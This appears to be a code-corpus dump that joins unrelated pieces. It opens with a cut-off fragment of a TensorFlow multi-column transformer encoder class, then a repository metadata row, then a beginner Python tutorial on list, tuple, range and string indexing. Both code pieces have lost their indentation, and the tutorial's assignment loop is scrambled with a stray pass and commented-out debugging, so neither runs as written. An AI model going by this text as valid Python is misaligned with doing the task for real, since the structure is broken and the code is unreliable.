config.set_attrib("attention_probs_dropout_prob", 0.0)
initializer = bc.create_initializer(config.initializer_range)
self.embedding_layer = Embedding2()
self.embedding_projector = bc.dense(config.hidden_size, initializer)
self.config = config
num_columns = config.num_columns
self.column_list = []
for tower_idx in range(num_columns):
column = ForwardColumn(config)
self.column_list.append(column)
self.num_layers = config.num_hidden_layers
self.num_columns = config.num_columns
self.num_column_tokens = config.num_column_tokens
self.column_embedding_list = []
self.use_one_hot_embeddings = use_one_hot_embeddings
self.config = config
column_mask = []
for column_idx in range(1, self.num_columns):
column_embedding = tf.Variable(lambda : initializer(shape=(self.num_column_tokens, config.hidden_size),
dtype=tf.float32),
name="column_embedding_{}".format(column_idx))
self.column_embedding_list.append(column_embedding)
column_mask += [1] * self.num_column_tokens
self.column_mask = tf.constant(column_mask)
self.all_raw_layers = []
self.all_main_layers = []
self.sequence_output = None
self.pooled_output = None
def get_column_embeddings(self, batch_size):
output = []
for column_embedding in self.column_embedding_list:
c_emb = tf.tile(tf.expand_dims(column_embedding, 0), [batch_size, 1, 1])
output.append(c_emb)
return output
def get_to_tensor_mask(self, batch_size, input_mask):
# [batch_size, seq_len + column_len]
t = tf.tile(tf.expand_dims(self.column_mask, 0), [batch_size, 1])
t = tf.concat([input_mask, t], axis=1)
return t
def embedding_projection(self, input_tensor):
if debug_mode:
with tf.compat.v1.variable_scope("embedding_projection", reuse=True):
return self.embedding_projector(input_tensor)
else:
return self.embedding_projector(input_tensor)
def forward(self, tensor_list, to_tensor_mask):
out_tensor_list = []
for column_idx, column in enumerate(self.column_list):
from_tensor = tensor_list[column_idx]
column.check_attention_mask(from_tensor, to_tensor_mask)
with tf.compat.v1.variable_scope("Column_{}".format(column_idx)):
out_tensor = column(from_tensor, tensor_list)
out_tensor_list.append(out_tensor)
return out_tensor_list
def call(self, input_ids, input_mask, segment_ids):
n_added_tokens = self.num_column_tokens * self.num_columns
input_ids = input_ids[:, :-n_added_tokens]
input_mask = input_mask[:, :-n_added_tokens]
segment_ids = segment_ids[:, :-n_added_tokens]
input_tensor = self.embedding_layer.apply(input_ids, segment_ids,
self.config.initializer_range,
self.config.vocab_size,
self.config.embedding_size,
self.config.type_vocab_size,
self.config.max_position_embeddings,
self.config.hidden_dropout_prob,
self.use_one_hot_embeddings)
self.embedding_output = input_tensor
input_tensor = self.embedding_projector(input_tensor) # [ batch_size, seq_len, hidden_dim ]
batch_size, _, _ = get_shape_list2(input_tensor)
tensor_list = [input_tensor] + self.get_column_embeddings(batch_size)
tensor_list = [Tensor2D(t) for t in tensor_list]
to_tensor_mask = self.get_to_tensor_mask(batch_size, input_mask)
for layer_no in range(self.num_layers):
with tf.compat.v1.variable_scope("layer", reuse=layer_no > 0):
tensor_list = self.forward(tensor_list, to_tensor_mask)
self.all_raw_layers.append(tensor_list)
self.all_main_layers.append(tensor_list[0])
self.embedding_table = self.embedding_layer.embedding_table
last_main_tensor = self.all_main_layers[-1]
self.sequence_output = last_main_tensor.get_3d()
self.sequence_output = tf.concat([self.sequence_output,
tf.zeros([batch_size, n_added_tokens, self.config.hidden_size])],
axis=1)
self.pooled_output = mimic_pooling(self.sequence_output, self.config.hidden_size, self.config.initializer_range)
        return self.sequence_output
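
# Illustrative wiring (config attributes inferred from the usages above, not a
# documented contract): config must expose hidden_size, num_attention_heads,
# intermediate_size, hidden_act, hidden_dropout_prob, attention_probs_dropout_prob,
# initializer_range, embedding_size, vocab_size, type_vocab_size,
# max_position_embeddings, num_hidden_layers, num_columns, num_column_tokens,
# plus a set_attrib(name, value) method.
#
#     model = HorizontalAlpha(config, is_training=True, use_one_hot_embeddings=False)
#     sequence_output = model.call(input_ids, input_mask, segment_ids)  # [B, L, hidden]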
d5de6683f124bae4468b8e2827a58b7b9fde5378 | 0b514feea82eaa2e341130d9e23d13d72271d644 | /3.Python_Coding_Basic/Step_01/Unit_11-1.py | 79a6192f84771f6e99d0e62b4531770a79637d29 | [] | no_license | Jerrykim91/FromZero | f8478012130948a11978a46ab6ec7922cb354a8f | fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4 | refs/heads/master | 2022-12-25T15:04:22.656462 | 2020-10-10T14:35:06 | 2020-10-10T14:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,919 | py | # User-defined helper function
from fun_pkg.random_num import random_num  # generates random numbers
# Unit_11-1.py
# Using indexes
txt_index = """
# Using indexes
=> Put [] (square brackets) after a sequence object and give an element's index
   inside the brackets to access that element.
 - Shows how to access the elements stored in a sequence object.
 - Every element of a sequence object has a fixed position, and that position
   is called its index.

   sequence_object[index]

## Index
 - Means a position marker, much like the tabs in a dictionary that show where
   each section begins.
 - Careful) sequence object indexes always start at 0!
"""
print(txt_index)
print('-'*40)
# Using indexes - 1
a = [38,26,53,72,19]
print('-'*20)
print(a[0]) # prints the first element of the list => index 0
print('-'*20)
print(a[2]) # prints the third element of the list => index 2
print('-'*20)
print(a[4]) # prints the fifth element of the list => index 4
print('-'*20)
# Tuple
b = (38,26,53,72,19)
print(b[2]) # prints the third element of the tuple => index 2
print('-'*20)
ran = range(0, 10, 2) # from 0 up to (but not including) 10, in steps of 2
r = list(ran)
print(ran[2])
print('-'*20)
print( r ) # the full list confirms that print(ran[2]) picked the right element
print('-'*40)
# String indexes
hello = 'hello world!'
print( hello[2] )
print( hello[5] ) # whitespace counts as a character too
print('-'*20)
hello = list(hello) # check: view each character as a list element
print(hello)
print('-'*40)
# If no index is given for a sequence object
# check it with c
c = [ 38, 26, 53, 72, 19]
print(c) # referencing c by itself prints the entire list stored in c
print('-'*40)
# The __getitem__ method
txt_getitem = """
# The __getitem__ method
When you use square brackets on a sequence object,
the __getitem__ method is what actually gets called to fetch the element.
It can also be called directly:

    sequence_object.__getitem__(index)

Further uses of __getitem__ are covered in unit_39 (iterators);
for now, let's just call it directly below.
"""
print(txt_getitem)
print('-'*40)
# The __getitem__ method - practice
a = list(range(10))
# print( a )
print(a.__getitem__(5))
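# Equivalent to a[5]; the bracket syntax is just sugar for __getitem__.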
print('-'*40)
# Specifying negative indexes
# fetch some random numbers with the helper function imported above
ran = random_num(5)
print(ran, ran[-2], ran[-1])
print('-'*40)
# Specifying indexes on a tuple
ran_1 = tuple(ran)
print(ran_1,ran_1[-3])
print('-'*40)
r = range(1,11,2)
print(r[-2])
print('-'*40)
hello = 'hello world!'
print(hello[-1])
print('-'*40)
# When an index goes out of range
# an error is raised => IndexError: list index out of range
# the error occurs because the list index went outside the valid range

# Accessing the last element
a = random_num(10)
print(a,'\n number of elements : ', len(a),'\n last element : ',a[len(a)-1])
# a[len(a)-1] is a pattern that is often used to get the last index!
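# Note: a[-1] reaches the last element more idiomatically.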
print('-'*40)
# Assigning a value to an element
"""
- sequence_object[index] = value
"""
tmp = []
zro = [0] * 5
rdm_num = random_num(5)
print('rdm_num :',rdm_num)
# print(zro)
for i in range(len(zro)):
# print('zro[%d] = ' % i, zro[i])
print(i)
for j in range(len(rdm_num)):
# print(rdm_num)
# dum = 0
pass
# print('test : rdm_num[%d] = ' % i, rdm_num[i])
    # print('why is nothing printing?')
zro[i] = rdm_num[i]
print('rdm_num[%d] = ' % i, rdm_num[i])
tmp.append(zro[i])
print('extracted zro[i] values :', tmp)
print('tmp[0] : ', tmp[0])
print('tmp[4] : ', tmp[4])
print('-'*40)
# Deleting an element with del
"""
del sequence_object[index]
"""
print(tmp) # before
del tmp[2]
print(tmp) # after -> confirms the element was deleted
print('-'*40)